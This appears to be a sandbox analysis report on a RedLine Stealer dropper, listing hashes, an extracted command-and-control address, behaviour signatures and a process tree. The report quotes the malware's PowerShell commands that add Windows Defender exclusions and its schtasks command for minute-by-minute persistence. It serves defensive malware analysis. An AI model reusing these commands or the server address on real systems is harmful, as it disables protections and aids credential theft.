Analysis
-
max time kernel
141s -
max time network
142s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
23-11-2024 10:59
Static task
static1
Behavioral task
behavioral1
Sample
b47f14557520a91ca888aa122d5816a21762e25535e24adc62351baf7edd3916.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
b47f14557520a91ca888aa122d5816a21762e25535e24adc62351baf7edd3916.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
$TEMP/K3M6Ljh9fd22.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
$TEMP/K3M6Ljh9fd22.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
$TEMP/Selfconvened.exe
Resource
win7-20241010-en
Behavioral task
behavioral6
Sample
$TEMP/Selfconvened.exe
Resource
win10v2004-20241007-en
General
-
Target
b47f14557520a91ca888aa122d5816a21762e25535e24adc62351baf7edd3916.exe
-
Size
4.6MB
-
MD5
35f1a7f185a05f2530238f7fb1f75206
-
SHA1
c8beeb9a3a6272305c8d4a99f29fc0f30b45f662
-
SHA256
b47f14557520a91ca888aa122d5816a21762e25535e24adc62351baf7edd3916
-
SHA512
f2f91e61e24e7aa4c9130658151d5fa4a20d5bc999af0e425faf98a7d64b6c789f5a861177a2ef8c51fff6ce202ee9e0e0a4d66c866ac88deeda222c8f53f345
-
SSDEEP
98304:Uq8eNY5p0ExtC6RpPwVsniC5u/BDLTABEp0moOjtchoKCq:Uqup0Ex8ArMdPABEp0pAKhfCq
Malware Config
Extracted
redline
@zxckostyan4ik
95.181.152.6:46927
-
auth_value
cdf3919a262c0d6ba99116b375d7551c
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 4 IoCs
resource yara_rule behavioral1/memory/2088-12-0x00000000003E0000-0x000000000040E000-memory.dmp family_redline behavioral1/memory/2088-19-0x00000000003E0000-0x000000000040E000-memory.dmp family_redline behavioral1/memory/2088-21-0x0000000002220000-0x0000000002240000-memory.dmp family_redline behavioral1/memory/2088-26-0x00000000003E0000-0x000000000040E000-memory.dmp family_redline -
Redline family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2016 powershell.exe 1284 powershell.exe -
Executes dropped EXE 4 IoCs
pid Process 2348 Selfconvened.exe 2088 K3M6Ljh9fd22.exe 2436 svchost.exe 1240 svchost.exe -
Loads dropped DLL 3 IoCs
pid Process 1968 b47f14557520a91ca888aa122d5816a21762e25535e24adc62351baf7edd3916.exe 1968 b47f14557520a91ca888aa122d5816a21762e25535e24adc62351baf7edd3916.exe 1964 taskeng.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\system32\WindowsPro\svchost.exe Selfconvened.exe File opened for modification C:\Windows\system32\WindowsPro\svchost.exe Selfconvened.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b47f14557520a91ca888aa122d5816a21762e25535e24adc62351baf7edd3916.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language K3M6Ljh9fd22.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1992 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2348 Selfconvened.exe 2016 powershell.exe 1284 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2348 Selfconvened.exe Token: SeDebugPrivilege 2016 powershell.exe Token: SeDebugPrivilege 1284 powershell.exe Token: SeDebugPrivilege 2436 svchost.exe Token: SeDebugPrivilege 1240 svchost.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 1968 wrote to memory of 2348 1968 b47f14557520a91ca888aa122d5816a21762e25535e24adc62351baf7edd3916.exe 30 PID 1968 wrote to memory of 2348 1968 b47f14557520a91ca888aa122d5816a21762e25535e24adc62351baf7edd3916.exe 30 PID 1968 wrote to memory of 2348 1968 b47f14557520a91ca888aa122d5816a21762e25535e24adc62351baf7edd3916.exe 30 PID 1968 wrote to memory of 2348 1968 b47f14557520a91ca888aa122d5816a21762e25535e24adc62351baf7edd3916.exe 30 PID 1968 wrote to memory of 2088 1968 b47f14557520a91ca888aa122d5816a21762e25535e24adc62351baf7edd3916.exe 31 PID 1968 wrote to memory of 2088 1968 b47f14557520a91ca888aa122d5816a21762e25535e24adc62351baf7edd3916.exe 31 PID 1968 wrote to memory of 2088 1968 b47f14557520a91ca888aa122d5816a21762e25535e24adc62351baf7edd3916.exe 31 PID 1968 wrote to memory of 2088 1968 b47f14557520a91ca888aa122d5816a21762e25535e24adc62351baf7edd3916.exe 31 PID 2348 wrote to memory of 1392 2348 Selfconvened.exe 34 PID 2348 wrote to memory of 1392 2348 Selfconvened.exe 34 PID 2348 wrote to memory of 1392 2348 Selfconvened.exe 34 PID 1392 wrote to memory of 2016 1392 cmd.exe 36 PID 1392 wrote to memory of 2016 1392 cmd.exe 36 PID 1392 wrote to memory of 2016 1392 cmd.exe 36 PID 2348 wrote to memory of 1992 2348 Selfconvened.exe 37 PID 2348 wrote to memory of 1992 2348 Selfconvened.exe 37 PID 2348 wrote to memory of 1992 2348 Selfconvened.exe 37 PID 1392 wrote to memory of 1284 1392 cmd.exe 39 PID 1392 wrote to memory of 1284 1392 cmd.exe 39 PID 1392 wrote to memory of 1284 1392 cmd.exe 39 PID 1964 wrote to memory of 2436 1964 taskeng.exe 41 PID 1964 wrote to memory of 2436 1964 taskeng.exe 41 PID 1964 wrote to memory of 2436 1964 taskeng.exe 41 PID 1964 wrote to memory of 1240 1964 taskeng.exe 42 PID 1964 wrote to memory of 1240 1964 taskeng.exe 42 PID 1964 wrote to memory of 1240 1964 taskeng.exe 42 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\b47f14557520a91ca888aa122d5816a21762e25535e24adc62351baf7edd3916.exe"C:\Users\Admin\AppData\Local\Temp\b47f14557520a91ca888aa122d5816a21762e25535e24adc62351baf7edd3916.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Users\Admin\AppData\Local\Temp\Selfconvened.exeC:\Users\Admin\AppData\Local\Temp\Selfconvened.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Windows\system32\cmd.exe"cmd" #cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit3⤵
- Suspicious use of WriteProcessMemory
PID:1392 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1284
-
-
-
C:\Windows\system32\schtasks.exe"schtasks" /create /f /sc minute /rl highest /mo 1 /tn "Bobsledding" /tr "C:\Windows\system32\WindowsPro\svchost.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1992
-
-
-
C:\Users\Admin\AppData\Local\Temp\K3M6Ljh9fd22.exeC:\Users\Admin\AppData\Local\Temp\K3M6Ljh9fd22.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2088
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {0C90CBAF-115E-44B5-98C8-142A24F2FDAE} S-1-5-21-1163522206-1469769407-485553996-1000:PJCSDMRP\Admin:Interactive:[1]1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Windows\system32\WindowsPro\svchost.exeC:\Windows\system32\WindowsPro\svchost.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2436
-
-
C:\Windows\system32\WindowsPro\svchost.exeC:\Windows\system32\WindowsPro\svchost.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1240
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
881KB
MD5ce5a9ec35a54e669820589d15f1faa07
SHA168a5aaa46aa2ce2c3083486f8e265e050cd421ac
SHA256a5317940f3f36d4c047ef70fcef5aedcdcdb0d9afae7ccfb3220190f09dab15b
SHA512eb097778c480b9e1bd396895ef86727997cb1c0bd1c3d6863a3d711216c2ce64d1ff647987b57c0e67b9b9673526cd28bc83aaf7177e11a9b348e2960f535131
-
Filesize
4.5MB
MD564b5e984fda860eedf19c29a124094fb
SHA1760c195741989e17b48ad52c13bed35e8ea51692
SHA2561f47c67d3baa635c4b7dd2bfed0a26a6bd499c3ab5a64d10b391a52e7d71ba39
SHA512187dbbc7137db41da77dd5c3d1471f82b157d031653109632adb9c49ea519f452b661cfd1845512661dcdb3b00bf2a02b2c3504406fb19ad89b06fcd6afee4e4
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5b18d63dda251da26ab241e848ed9ac07
SHA1bae00a1a9323c8f1b5fb15f157128a4f64434d73
SHA256d03dabf1ed6639cdb19492a2eec36aec0a2185e31cd0aee03d47cc482d3e2662
SHA512d1419f3a840f76b4ba5feece7e1092c417f8a8abd49b091117e1307f4db722c8c895df57525c0d05b451affdeabc6f513711e44e538b400a398c5f2f8ec8c445
-
Filesize
10.1MB
MD5e4fa0d1dbf5537c7e45b6574105fb9ac
SHA1fe654890102dd381062ceb060f2a2216511ebf70
SHA2564836c56118d6d22ff7fc2d140c34df2311a22e474ed9b5cf71e87edb4990f3a5
SHA512eb4ba48bbd43c1b97cb9f870692ce99daf430bd79dd13648caffc56ab9a26f0b661bd61160e74d57121e1f0a37c55d92a84eec484c4de4e6fdd69f5b3527b849